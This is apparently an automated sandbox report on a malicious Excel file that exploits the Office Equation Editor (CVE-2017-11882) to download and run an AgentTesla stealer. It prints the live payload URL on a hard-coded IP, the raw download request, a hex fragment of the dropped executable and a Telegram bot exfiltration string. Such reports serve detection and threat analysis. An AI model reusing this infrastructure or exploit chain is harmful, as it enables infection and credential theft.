Analysis Report Catalog of our new order.xlsx

Overview

General Information

Sample Name: Catalog of our new order.xlsx
Analysis ID: 321291
MD5: f19674cfbff25cbd3f128ffd8e78c5c4
SHA1: 07bf03f3b749c3d7f93758068f5a26c520279388
SHA256: 02781481c25663e541fd70525609f84129fb57cf044e57c3e3410972267acc30
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://192.158.231.122/light.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Catalog of our new order.xlsx ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.158.231.122:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.158.231.122:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 20 Nov 2020 12:02:01 GMTAccept-Ranges: bytesETag: "a0bb98f434bfd61:0"Server: Microsoft-IIS/10.0Date: Fri, 20 Nov 2020 18:32:05 GMTContent-Length: 618496Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a b0 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 68 09 00 00 06 00 00 00 00 00 00 4e 87 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 ac 54 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 87 09 00 4b 00 00 00 00 a0 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 67 09 00 00 20 00 00 00 68 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 09 00 00 04 00 00 00 6a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 87 09 00 00 00 00 00 48 00 00 00 02 00 05 00 60 e7 08 00 a0 9f 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 70 75 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 19 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DC74-ASUS DC74-ASUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /light.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.158.231.122Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.231.122
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85EDDC46.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /light.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.158.231.122Connection: Keep-Alive
Source: vbc.exe, 00000004.00000002.2362766983.0000000004B1F000.00000004.00000001.sdmp String found in binary or memory: http://ns.a88
Source: vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: protected documents theyaoww*~ 24 25 26 27 28 29 ~ 30 " " " 31 ' " 32 33 0 0 0 0 0 q 34
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_013CF3A9 4_2_013CF3A9
Source: C:\Users\Public\vbc.exe Code function: 4_2_013D0078 4_2_013D0078
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Catalog of our new order.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: light[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.winXLSX@33204/6@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Catalog of our new order.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE1D6.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Catalog of our new order.xlsx ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Catalog of our new order.xlsx Initial sample: OLE indicators vbamacros = False
Source: Catalog of our new order.xlsx Initial sample: OLE indicators encrypted = True
Source: initial sample Static PE information: section name: .text entropy: 7.86673164949
Source: initial sample Static PE information: section name: .text entropy: 7.86673164949

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: Catalog of our new order.xlsx Stream path 'EncryptedPackage' entropy: 7.9980445334 (max. 8.0)

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564 Thread sleep time: -480000s >= -30000s Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 321291 Sample: Catalog of our new order.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 24 Antivirus detection for URL or domain 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->28 30 10 other signatures 2->30 6 EQNEDT32.EXE 12 2->6         started        11 EXCEL.EXE 37 17 2->11         started        process3 dnsIp4 22 192.158.231.122, 49167, 80 DC74-ASUS United States 6->22 16 C:\Users\user\AppData\Local\...\light[1].exe, PE32 6->16 dropped 18 C:\Users\Public\vbc.exe, PE32 6->18 dropped 32 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->32 13 vbc.exe 6->13         started        20 C:\Users\...\~$Catalog of our new order.xlsx, data 11->20 dropped file5 signatures6 process7 signatures8 34 Machine Learning detection for dropped file 13->34
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.158.231.122
unknown United States
17216 DC74-ASUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.158.231.122/light.exe true
  • Avira URL Cloud: malware
unknown